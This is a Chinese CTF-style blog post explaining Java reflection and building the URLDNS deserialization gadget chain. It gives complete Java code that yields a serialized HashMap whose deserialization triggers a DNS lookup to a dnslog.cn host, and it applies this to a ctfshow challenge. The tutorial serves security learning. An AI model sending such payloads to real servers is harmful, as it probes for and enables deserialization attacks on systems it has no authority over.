<!DOCTYPE html>
<html data-theme="">
<head>
    <!-- ! 引用文件位置-->
    <!--引用文件位置-->
<meta charset="utf-8">
<title>原神，启动！！</title>
<!--    daisyui cdn-->
<link href="https://cdn.jsdelivr.net/npm/daisyui@4.5.0/dist/full.min.css" rel="stylesheet" type="text/css"/>
<!--     tailwindcss cdn daisyui 前置-->
<script src="https://cdn.tailwindcss.com"></script>
<!--    更改主题颜色-->
<script src="https://cdn.jsdelivr.net/npm/theme-change@2.0.2/index.js"></script>
<!--自动排版-->
<!--    <link rel="stylesheet" href="https://unpkg.com/@tailwindcss/typography@^0.4.0/dist/typography.min.css" type="text/css">-->
<script src="https://cdn.tailwindcss.com?plugins=forms,typography,aspect-ratio,line-clamp"></script>
<!--    谷歌字体库镜像-->
<style>
    @import url('https://fonts.font.im/css?family=Barlow:700|Bitter');
</style>
<!--jquery-->
<script src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script>
<!--    fancybox-->
<link rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" type="text/css">
<script src="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js"></script>
<!--highlight 代码高亮 使用hexo的不会高亮-->
<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@latest/build/highlight.min.js"></script>
<script>
    hljs.highlightAll();
</script>
<link rel="stylesheet"
      href="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@latest/build/styles/vs2015.min.css">
<!--LeanCLoud-->
<script src="https://cdn.jsdelivr.net/npm/leancloud-storage@4.15.2/dist/av.min.js"></script>
<!--卜算子busuanzi-->
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<!--    自定义css-->

<link rel="stylesheet" href="/css/output.css">


<link rel="stylesheet" href="/css/style.css">

<!--    自定义js-->

<script src="/js/view.js"></script>


<script src="/js/fancybox.js"></script>


<script src="/js/search.js"></script>

<!--去除referrer检测 要写在head里面 但是似乎影响进站查看-->
<meta name="referrer" content="no-referrer"/>
<meta name="generator" content="Hexo 7.0.0"></head>
<body>
<!--导航栏-->
<div class="fixed z-10 w-full">
    <div class="container-nav justify-center flex">
        <div class="navbar bg-base-100 shadow-xl rounded-box w-10/12 my-6 z-10">
            <div class="flex-1">
                <a class="btn btn-ghost text-xl" href="/">Natro92&#39;s Site</a>
            </div>
            <div class="flex-none gap-2">
                <ul class="menu menu-horizontal px-1">
                    
                    
                        
                            <!--去掉最后一位是，-->
                            <li><a href="/">首页</a></li>
                        
                            <!--去掉最后一位是，-->
                            <li><a href="/blogs">归档</a></li>
                        
                            <!--去掉最后一位是，-->
                            <li><a href="/tags">标签</a></li>
                        
                            <!--去掉最后一位是，-->
                            <li><a href="/categories">分类</a></li>
                        
                            <!--去掉最后一位是，-->
                            <li><a href="/link">更多</a></li>
                        
                    
                    <!--<li><a href="/">Home</a></li>-->
                    <!--<li><a href="/blogs">Archive</a></li>-->
                    <!--<li><a href="/about/">About</a></li>-->
                    <li>
                        <details class="dropdown">
                            <summary>
                                更换主题
                            </summary>
                            <ul tabindex="0"
                                class="dropdown-content z-[1] p-2 bg-base-100 rounded-box w-58 max-h-96 overflow-y-auto overflow-x-hidden shadow">
                                <!--                                <li><a class="border-base-content/20 hover:border-base-content/40 overflow-hidden rounded-lg border outline outline-2 outline-offset-2 outline-transparent !outline-base-content" data-set-theme="emerald" data-act-class="!outline-base-content"><div data-theme="emerald" class="bg-base-100 text-base-content w-full cursor-pointer font-sans"><div class="grid grid-cols-5 grid-rows-3"><div class="bg-base-200 col-start-1 row-span-2 row-start-1"></div> <div class="bg-base-300 col-start-1 row-start-3"></div> <div class="bg-base-100 col-span-4 col-start-2 row-span-3 row-start-1 flex flex-col gap-1 p-2"><div class="font-bold">emerald</div> <div class="flex flex-wrap gap-1"><div class="bg-primary flex aspect-square w-5 items-center justify-center rounded lg:w-6"><div class="text-primary-content text-sm font-bold">A</div></div> <div class="bg-secondary flex aspect-square w-5 items-center justify-center rounded lg:w-6"><div class="text-secondary-content text-sm font-bold">A</div></div> <div class="bg-accent flex aspect-square w-5 items-center justify-center rounded lg:w-6"><div class="text-accent-content text-sm font-bold">A</div></div> <div class="bg-neutral flex aspect-square w-5 items-center justify-center rounded lg:w-6"><div class="text-neutral-content text-sm font-bold">A</div></div></div></div></div></div> </a></li>-->
                                <!--主题选择配置，主题来自daisyui-->

<li><a data-set-theme="light">Light</a></li>
<li><a data-set-theme="dark">Night</a></li>
<li><a data-set-theme="cupcake">Cupcake</a></li>
<li><a data-set-theme="bumblebee">Bumblebee</a></li>
<li><a data-set-theme="emerald">Emerald</a></li>
<li><a data-set-theme="coporate">Corporate</a></li>
<li><a data-set-theme="synthwave">Synthwave</a></li>
<li><a data-set-theme="retro">Retro</a></li>
<li><a data-set-theme="cyberpunk">Cyberpunk</a></li>
<li><a data-set-theme="halloween">Halloween</a></li>
<li><a data-set-theme="garden">Garden</a></li>
<li><a data-set-theme="forest">Forest</a></li>
<li><a data-set-theme="aqua">Aqua</a></li>
<li><a data-set-theme="lofi">Lo-fi</a></li>
<li><a data-set-theme="pastel">Pastel</a></li>
<li><a data-set-theme="fantasy">Fantasy</a></li>
<li><a data-set-theme="wireframe">Wireframe</a></li>
<li><a data-set-theme="black">Black</a></li>
<li><a data-set-theme="luxury">Luxury</a></li>
<li><a data-set-theme="dracula">Dracula</a></li>
<li><a data-set-theme="cmyk">CMYK</a></li>
<li><a data-set-theme="autumn">Autumn</a></li>
<li><a data-set-theme="business">Business</a></li>
<li><a data-set-theme="acid">Acid</a></li>
<li><a data-set-theme="lemonade">Lemonade</a></li>
<li><a data-set-theme="night">Night</a></li>
<li><a data-set-theme="coffee">Coffee</a></li>
<li><a data-set-theme="winter">Winter</a></li>
<li><a data-set-theme="dim">Dim</a></li>
<li><a data-set-theme="nord">Nord</a></li>
<li><a data-set-theme="sunset">Sunset</a></li>
                            </ul>
                        </details>
                    </li>
                </ul>
                <div class="form-control">

                    <input type="text" placeholder="Search is not yet!" id="local-search-input"
                           class="st-search-input input input-bordered w-24 md:w-auto rounded-xl"/>
                    <div id="local-search-result" class="local-search-result-cls rounded-xl"></div>
                    <script type="text/javascript" id="local.search.active">
                        var inputArea = document.querySelector("#local-search-input");
                        inputArea.onclick = function () {
                            getSearchFile();
                            this.onclick = null
                        }
                        inputArea.onkeydown = function () {
                            if (event.keyCode === 13) return false
                        }
                    </script>
                </div>
                <div class="dropdown dropdown-end">
                    <div tabindex="0" role="button" class="btn btn-ghost btn-circle avatar">
                        <div class="w-10 rounded-full">
                            <a target="_blank" rel="noopener" href="https://github.com/natro92">
                                <img alt="Tailwind CSS Navbar component"
                                     src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1706006117478-a75e82ba-dea0-46bd-be3b-fa82cb80209c.png"/>
                            </a>
                        </div>
                    </div>
                    <!--TODO 完成这里-->
                    <!--<ul tabindex="0"-->
                    <!--    class="mt-3 z-[1] p-2 shadow menu menu-sm dropdown-content bg-base-100 rounded-box w-52">-->
                    <!--    <li>-->
                    <!--        <a class="justify-between">-->
                    <!--            Profile-->
                    <!--            <span class="badge">New</span>-->
                    <!--        </a>-->
                    <!--    </li>-->
                    <!--    <li><a>Settings</a></li>-->
                    <!--    <li><a>Logout</a></li>-->
                    <!--</ul>-->
                </div>
            </div>
        </div>
    </div>
</div>
<!--导航栏结束-->
<div class="fleet">
    <!--    嵌套位置-->
    <!-- 博客详情 -->


<!--Post开始-->
<div class="fleet container-nav justify-center flex mb-16 w-full">
    <div class="w-8/12 justify-center flex">
        <div class="fleet-body flex-col w-full">
            <div class="fleet-header">
                <div class="fleet-content-header-title text-6xl">
                    <h1 class="inline-block font-extrabold mt-16 mb-8">Java反序列化之反射和URLDNS</h1>
                </div>
                <div class="fleet-content-header-info">
                    <span>2024/01/22 18:38:09</span>
                </div>
            </div>
            <div class="divider w-full"></div>
            <div class="fleet-content mt-8">
                <div class="fleet-content-body">
                    <div class="fleet-content-body-content justify-center flex w-full">
                        
                        <!--代码块-->
                        <!--高亮使用的prismjs需要将class中的python改为language-python-->
                        
                        <!--图片-->
                        
                        <article class="prose">
                            <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>学习视频从这里开始看：</p>
<ul>
<li>第一部分：<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV16h411z7o9?t=1105.7&p=2">https://www.bilibili.com/video/BV16h411z7o9?t=1105.7&p=2</a></li>
<li>第二部分：<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV16h411z7o9?t=1180.1">https://www.bilibili.com/video/BV16h411z7o9?t=1180.1</a></li>
</ul>
<h2 id="快捷键"><a href="#快捷键" class="headerlink" title="快捷键"></a>快捷键</h2><p>这里有几个快捷键，可以记忆一下。<br>比如说查看结构：<code>alt</code>+<code>7</code><br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705911881513-def44fe6-1290-402e-ac72-e5d469dc27b3.png" alt="image.png"><br>查看层次结构：<code>ctrl</code> + <code>H</code><br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705911911141-796d9fcd-ccf9-4b57-8857-99b0c8bbfebf.png" alt="image.png"></p>
<h1 id="URLDNS-链子构建"><a href="#URLDNS-链子构建" class="headerlink" title="URLDNS 链子构建"></a>URLDNS 链子构建</h1><h2 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h2><p>URL有继承Serializable就证明他是可以被序列化的：<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705912047710-4b30948a-d2c6-494a-b1ad-21456f7223ce.png" alt="image.png"><br>而且需要使用一个较为常见的函数hashCode：<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705912179145-ba171de9-9986-41de-bff3-dd8b6bf833c2.png" alt="image.png"><br>调用了handler的hashCode函数，<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705912277976-1cccbd4c-039a-4cd2-9c20-593fb3f00bad.png" alt="image.png"><br>其中的getHostAddress就会对域名进行解析，然后就可以利用。<br>dnslog生成一个网址来测试。</p>
<pre class="language-java" data-language="java"><code class="language-java">import java.io.*;
import java.net.URL;
import java.util.HashMap;

public class URLDNS &#123;

    static String tarURL &#x3D; &quot;http:&#x2F;&#x2F;qdgj5w.dnslog.cn&quot;;

    public static void serialize(Object obj) throws IOException&#123;
        ObjectOutputStream objectOutputStream &#x3D; new ObjectOutputStream(new FileOutputStream(&quot;ser.bin&quot;));
        objectOutputStream.writeObject(obj);
    &#125;

    public static void main(String[] args) throws Exception&#123;
        HashMap&lt;URL, Integer&gt; hashMap &#x3D; new HashMap&lt;URL, Integer&gt;();
        URL url &#x3D; new URL(tarURL);
        hashMap.put(url, 1);
        serialize(hashMap);
    &#125;
&#125;
</code></pre>
<p>正常来说当运行 main 函数时不会访问URL，但实际上运行的结果是会访问URL的。<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705913035776-ba8b7b09-5761-4a22-ad4c-b150a34bc108.png" alt="image.png"><br>为什么呢，因为HashMap的put方法中就已经调用了hashCode函数：</p>
<pre class="language-java" data-language="java"><code class="language-java">public V put(K key, V value) &#123;
        return putVal(hash(key), key, value, false, true);
&#125;</code></pre>
<p>其中的hash()：</p>
<pre class="language-java" data-language="java"><code class="language-java">static final int hash(Object key) &#123;
        int h;
        return (key &#x3D;&#x3D; null) ? 0 : (h &#x3D; key.hashCode()) ^ (h &gt;&gt;&gt; 16);
    &#125;</code></pre>
<p>hashCode会被初始化设定为-1.<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705913461604-8214e6ce-89b4-45b9-8904-d4fd859ae638.png" alt="image.png"><br>如果在put方法中执行一次，导致其不再是-1，就无法进入后面的handler的hashCode。<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705913412666-b77e9157-9983-4d30-a486-139748902adc.png" alt="image.png"><br>这就会导致不执行handler的hashCode。<br>也就是：</p>
<pre class="language-java" data-language="java"><code class="language-java">设定 hashCode &#x3D; -1
↓
hashmap.put(url, 1);
↓
hashcode &#x3D; url的hashCode</code></pre>
<p>无法在serialize中触发。<br>我们可以测试一下在发序列化中是否触发：</p>
<pre class="language-java" data-language="java"><code class="language-java">class Deserialize &#123;
    static String filename &#x3D; &quot;ser.bin&quot;;
    public static Object deserialize(String filename) throws IOException, ClassNotFoundException &#123;
        ObjectInputStream objectInputStream &#x3D; new ObjectInputStream(new FileInputStream(filename));
        Object obj &#x3D; objectInputStream.readObject();
        return obj;
    &#125;

    public static void main(String[] args) throws IOException, ClassNotFoundException &#123;
        deserialize(filename);
    &#125;
&#125;</code></pre>
<p>运行之后并没有收到请求。<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705914084629-ec29f1ac-515a-482d-8d34-a5f827f99fd7.png" alt="image.png"><br>也就是说我们目前的问题就变成了：</p>
<pre class="language-java" data-language="java"><code class="language-java">HashMap&lt;URL, Integer&gt; hashMap &#x3D; new HashMap&lt;URL, Integer&gt;();
        &#x2F;&#x2F; * 正常使用这个会导致开始的时候访问一次，让这里不要发起请求
        URL url &#x3D; new URL(tarURL);
        hashMap.put(url, 1);
        &#x2F;&#x2F; * 在这里将hashCode改回-1
        serialize(hashMap);</code></pre>
<p>其中这里将hashCode改回1就用到了反射，那反射是什么呢？</p>
<h2 id="正射和反射"><a href="#正射和反射" class="headerlink" title="正射和反射"></a>正射和反射</h2><p>要想知道什么是反射，那就要先了解什么是正射：</p>
<pre class="language-java" data-language="java"><code class="language-java">Player boogipop &#x3D; new Player();
boogipop.playGame(&quot;GENSHIN&quot;);</code></pre>
<p>也就是先实例化对象，然后对对象进行操作。<br>而反射与正射不同，比如你并不知道原来所实例化的对象是什么。</p>
<pre class="language-java" data-language="java"><code class="language-java">Class class1 &#x3D; boogipop.getClass();
Method method1 &#x3D; class1.getMethod(&quot;playGame&quot;, String.class);
Constructor constructor &#x3D; class1.getConstructor();
Object object &#x3D; constructor.newInstance();
method1.invoke(object, &quot;GENSHIN&quot;);</code></pre>
<p>示例代码：</p>
<pre class="language-java" data-language="java"><code class="language-java">class ReflectionTest &#123;
    public static void main(String[] args) &#123;
        Person person &#x3D; new Person();
        Class c &#x3D; person.getClass();
        &#x2F;&#x2F; * 反射就是对Class进行操作
        &#x2F;&#x2F; * 从抽象类Class中实例化对象
        &#x2F;&#x2F; c.newInstance();
        &#x2F;&#x2F; * 获取构造器 比如需要传入什么参数
        Constructor constructor &#x3D; c.getConstructor(String.class, int.class);
        &#x2F;&#x2F; * 传入参数，生成对象
        Person person &#x3D; (Person) constructor.newInstance(&quot;Boogipop&quot;, 6);
        System.out.println(person);
        &#x2F;&#x2F; * 获取参数
        Field[] personFields &#x3D; c.getFields();
        &#x2F;&#x2F; * 获取所有参数 包括private protected等
        Field[] personFields1 &#x3D; c.getDeclaredFields();
        for (Field f:personFields)&#123;
            System.out.println(f);
        &#125;
        &#x2F;&#x2F; * 根据变量名获取
        Field nameField &#x3D; c.getField(&quot;name&quot;);
        &#x2F;&#x2F; * 允许访问
        nameField.setAccessible(true);
        nameField.set(person, &quot;Berial&quot;);
        System.out.println(person);
        &#x2F;&#x2F; * 调用方法
        Method[] method &#x3D; c.getMethods();
        for (Method method1:method)&#123;
            System.out.println(method1);
        &#125;
        &#x2F;&#x2F; * 获取方法
        Method actionMethod &#x3D; c.getMethod(&quot;playGame&quot;, String.class);
        &#x2F;&#x2F; * 执行方法
        actionMethod.invoke(person, &quot;GENSHIN&quot;);
    &#125;
&#125;</code></pre>
<h2 id="修改代码"><a href="#修改代码" class="headerlink" title="修改代码"></a>修改代码</h2><p>知道了反射，就可以使用反射修改其中的hashCode。<br>也就是这样：</p>
<pre class="language-java" data-language="java"><code class="language-java">public static void main(String[] args) throws Exception&#123;
    HashMap&lt;URL, Integer&gt; hashMap &#x3D; new HashMap&lt;URL, Integer&gt;();
    &#x2F;&#x2F; * 正常使用这个会导致开始的时候访问一次，让这里不要发起请求
    &#x2F;&#x2F; * 如果hashCode已经是-1了就不会发起请求
    URL url &#x3D; new URL(tarURL);
    Class c &#x3D; url.getClass();
    Field hashCode &#x3D; c.getDeclaredField(&quot;hashCode&quot;);
    hashCode.setAccessible(true);
    &#x2F;&#x2F; 随便赋值一个不是-1就行
    hashCode.set(url, 1);
    hashMap.put(url, 1);
    &#x2F;&#x2F; * 在这里将hashCode改回-1
    hashCode.set(url, -1);
    serialize(hashMap);
&#125;</code></pre>
<p>在反序列化之后我们才收到请求：<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705918481578-104f0ce8-3145-4649-9786-3f06e25186dc.png" alt="image.png"><br>完整代码：</p>
<pre class="language-java" data-language="java"><code class="language-java">import java.io.*;
import java.lang.reflect.*;
import java.net.URL;
import java.util.Base64;
import java.util.HashMap;

public class URLDNS &#123;
    &#x2F;&#x2F; * 记得去掉后面的&#x2F;
    static String tarURL &#x3D; &quot;http:&#x2F;&#x2F;test&quot;;

    public static void serialize(Object obj) throws IOException&#123;
        ObjectOutputStream objectOutputStream &#x3D; new ObjectOutputStream(new FileOutputStream(&quot;ser.bin&quot;));
        objectOutputStream.writeObject(obj);
    &#125;

    public static void main(String[] args) throws Exception&#123;
        HashMap&lt;URL, Integer&gt; hashMap &#x3D; new HashMap&lt;URL, Integer&gt;();
        &#x2F;&#x2F; * 正常使用这个会导致开始的时候访问一次，让这里不要发起请求
        &#x2F;&#x2F; * 如果hashCode已经是-1了就不会发起请求
        URL url &#x3D; new URL(tarURL);
        Class c &#x3D; url.getClass();
        Field hashCode &#x3D; c.getDeclaredField(&quot;hashCode&quot;);
        hashCode.setAccessible(true);
        &#x2F;&#x2F; 随便赋值一个不是-1就行
        hashCode.set(url, 1);
        hashMap.put(url, 1);
        &#x2F;&#x2F; * 在这里将hashCode改回-1
        hashCode.set(url, -1);
        serialize(hashMap);
    &#125;
&#125;

class Deserialize &#123;
    static String filename &#x3D; &quot;ser.bin&quot;;
    public static Object deserialize(String filename) throws IOException, ClassNotFoundException &#123;
        ObjectInputStream objectInputStream &#x3D; new ObjectInputStream(new FileInputStream(filename));
        Object obj &#x3D; objectInputStream.readObject();
        return obj;
    &#125;

    public static void main(String[] args) throws IOException, ClassNotFoundException &#123;
        deserialize(filename);
    &#125;
&#125;

</code></pre>
<h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><blockquote>
<p>ctfshow web846</p>
</blockquote>
<p><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705919075679-2e31b01d-31d4-4658-88c8-7ec122a03666.png" alt="image.png"><br>修改serialize代码：</p>
<pre class="language-java" data-language="java"><code class="language-java">public static void serialize(Object obj) throws IOException&#123;
        ByteArrayOutputStream byteArrayOutputStream &#x3D; new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream &#x3D; new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(obj);
        objectOutputStream.flush();
        objectOutputStream.close();
        System.out.println(Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray()));
    &#125;</code></pre>
<p>来方便查看输出的内容。<br>post传入输出的内容即可：<br><img class="rounded-lg max-w-6/12 max-h-6/12 mt-2 mb-0" src="https://cdn.nlark.com/yuque/0/2024/png/34866087/1705919699691-9b7f04cb-a231-41c6-b870-4e7ea3731298.png" alt="image.png"></p>

                        </article>
                    </div>


                    <div class="fleet-content-body-footer mt-16">
                        <!--翻页器-->
                        <div class="flex-row flex w-full justify-between">
                            <div class="fleet-content-body-footer-left">
                                
                                    <div><a href="/posts/ac1fd128/"
                                            class="btn btn-sm md:btn-md gap-2 lg:gap-3">
                                            <svg class="h-6 w-6 fill-current md:h-8 md:w-8"
                                                 xmlns="http://www.w3.org/2000/svg"
                                                 width="24" height="24" viewBox="0 0 24 24">
                                                <path d="M15.41,16.58L10.83,12L15.41,7.41L14,6L8,12L14,18L15.41,16.58Z"></path>
                                            </svg>
                                            <div class="flex flex-col items-start"><span
                                                        class="text-base-content/50 hidden text-xs font-normal md:block">上一篇</span>
                                                <span>Java反序列化之CC1</span></div>
                                        </a></div>
                                
                            </div>
                            <div class="fleet-content-body-footer-right">
                                
                                    <div><a href="/posts/f5628547/"
                                            class="btn btn-neutral btn-sm md:btn-md gap-2 lg:gap-3">
                                            <div class="flex flex-col items-end"><span
                                                        class="text-neutral-content/50 hidden text-xs font-normal md:block">下一篇</span>
                                                <span>web373-web378XXE篇</span></div>
                                            <svg class="h-6 w-6 fill-current md:h-8 md:w-8"
                                                 xmlns="http://www.w3.org/2000/svg"
                                                 width="24" height="24" viewBox="0 0 24 24">
                                                <path d="M8.59,16.58L13.17,12L8.59,7.41L10,6L16,12L10,18L8.59,16.58Z"></path>
                                            </svg>
                                        </a></div>

                                
                            </div>
                        </div>
                    </div>
                </div>
            </div>

        </div>
    </div>
</div>

    <!--    嵌套位置结束-->
    <!--<h3>categories</h3>-->
    <!--<ul>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/categories/CTF/">-->
    <!--                CTF-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/categories/CTF/JavaSec/">-->
    <!--                JavaSec-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/categories/Python/">-->
    <!--                Python-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--</ul>-->

    <!--<h3>tags</h3>-->
    <!--<ul>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">-->
    <!--                Java反序列化-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/CC%E9%93%BE/">-->
    <!--                CC链-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/WriteUp/">-->
    <!--                WriteUp-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/CTFshow0-1/">-->
    <!--                CTFshow0-1-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/CISCN/">-->
    <!--                CISCN-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/%E8%84%9A%E6%9C%AC/">-->
    <!--                脚本-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/Tampermonkey/">-->
    <!--                Tampermonkey-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/Shortcut/">-->
    <!--                Shortcut-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--        <li>-->
    <!--            <a href="/tags/%E8%AF%AD%E9%9B%80/">-->
    <!--                语雀-->
    <!--            </a>-->
    <!--        </li>-->
    <!--    -->
    <!--</ul>-->
</div>
<!--返回顶部按钮-->
<button class="backToTopBtn btn" title="返回顶部">&#8593;</button>
<!--加个渐变，但还是有点丑-->
<!-- TODO 换个更好的方案-->
<div class="h-1 bg-gradient-to-t from-base-content to-base-100">
</div>

<footer class="footer p-10 bg-neutral text-neutral-content">
    <aside>
        <svg width="50" height="50" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" fill-rule="evenodd" clip-rule="evenodd" class="fill-current mt-3"><path d="M22.672 15.226l-2.432.811.841 2.515c.33 1.019-.209 2.127-1.23 2.456-1.15.325-2.148-.321-2.463-1.226l-.84-2.518-5.013 1.677.84 2.517c.391 1.203-.434 2.542-1.831 2.542-.88 0-1.601-.564-1.86-1.314l-.842-2.516-2.431.809c-1.135.328-2.145-.317-2.463-1.229-.329-1.018.211-2.127 1.231-2.456l2.432-.809-1.621-4.823-2.432.808c-1.355.384-2.558-.59-2.558-1.839 0-.817.509-1.582 1.327-1.846l2.433-.809-.842-2.515c-.33-1.02.211-2.129 1.232-2.458 1.02-.329 2.13.209 2.461 1.229l.842 2.515 5.011-1.677-.839-2.517c-.403-1.238.484-2.553 1.843-2.553.819 0 1.585.509 1.85 1.326l.841 2.517 2.431-.81c1.02-.33 2.131.211 2.461 1.229.332 1.018-.21 2.126-1.23 2.456l-2.433.809 1.622 4.823 2.433-.809c1.242-.401 2.557.484 2.557 1.838 0 .819-.51 1.583-1.328 1.847m-8.992-6.428l-5.01 1.675 1.619 4.828 5.011-1.674-1.62-4.829z"></path></svg>
        © 2020-2024 Lupas by Natro92
        <pre class="whitespace-pre-line">框架 <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/">Hexo</a> | 主题 <a target="_blank" rel="noopener" href="https://www.example.com">Lupas</a></pre>
    </aside>
    <nav>
        <header class="footer-title">Social</header>
        <!--<div class="grid grid-flow-col gap-4">-->
        <!--    <a><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" class="fill-current"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"></path></svg></a>-->
        <!--    <a><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" class="fill-current"><path d="M19.615 3.184c-3.604-.246-11.631-.245-15.23 0-3.897.266-4.356 2.62-4.385 8.816.029 6.185.484 8.549 4.385 8.816 3.6.245 11.626.246 15.23 0 3.897-.266 4.356-2.62 4.385-8.816-.029-6.185-.484-8.549-4.385-8.816zm-10.615 12.816v-8l8 3.993-8 4.007z"></path></svg></a>-->
        <!--    <a><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" class="fill-current"><path d="M9 8h-3v4h3v12h5v-12h3.642l.358-4h-4v-1.667c0-.955.192-1.333 1.115-1.333h2.885v-5h-3.808c-3.596 0-5.192 1.583-5.192 4.615v3.385z"></path></svg></a>-->
        <!--</div>-->
    </nav>
</footer>
</body>

</html>


